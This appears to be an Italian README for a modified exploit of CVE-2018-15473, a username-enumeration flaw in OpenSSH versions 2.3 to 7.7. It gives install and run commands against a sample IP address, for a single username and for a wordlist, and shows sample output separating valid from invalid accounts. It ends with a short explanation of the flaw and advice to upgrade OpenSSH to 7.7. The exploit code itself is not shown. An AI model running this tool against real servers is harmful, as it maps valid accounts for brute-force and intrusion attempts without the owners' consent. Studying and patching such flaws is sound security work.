
OpenSSH 2.3 < 7.7 - Enumerazione degli username
SSH-Username-Enumeration-Exploit (OpenSSH 2.3 < 7.7)
Versione modificata dell'exploit originale: https://www.exploit-db.com/exploits/45233
#Ensure that you install the requirements:
foo@bar:~$ pip3 install -r requirements.txt
#For single username:
foo@bar:~$ ./CVE-2018-15473.py 192.168.1.20 -u root
[+] root is a valid username
#For multiple username:
foo@bar:~$ ./CVE-2018-15473.py 192.168.1.20 -w username_wordlist.txt
[+] root is a valid username
[-] mysql is an invalid username
[-] mike is an invalid username
[-] foo is an invalid username
[-] bar is an invalid username
Valid Users:
root
#For more option:
foo@bar:~$ ./CVE-2018-15473.py -h
Il sistema risponde in modo diverso ai tentativi di autenticazione validi e non validi. Un utente remoto può inviare richieste appositamente predisposte per determinare nomi utente validi sul sistema di destinazione. Pertanto, un utente remoto può determinare nomi utente validi sul sistema di destinazione.
Il server OpenSSH dovrebbe essere aggiornato alla versione 7.7 o superiore.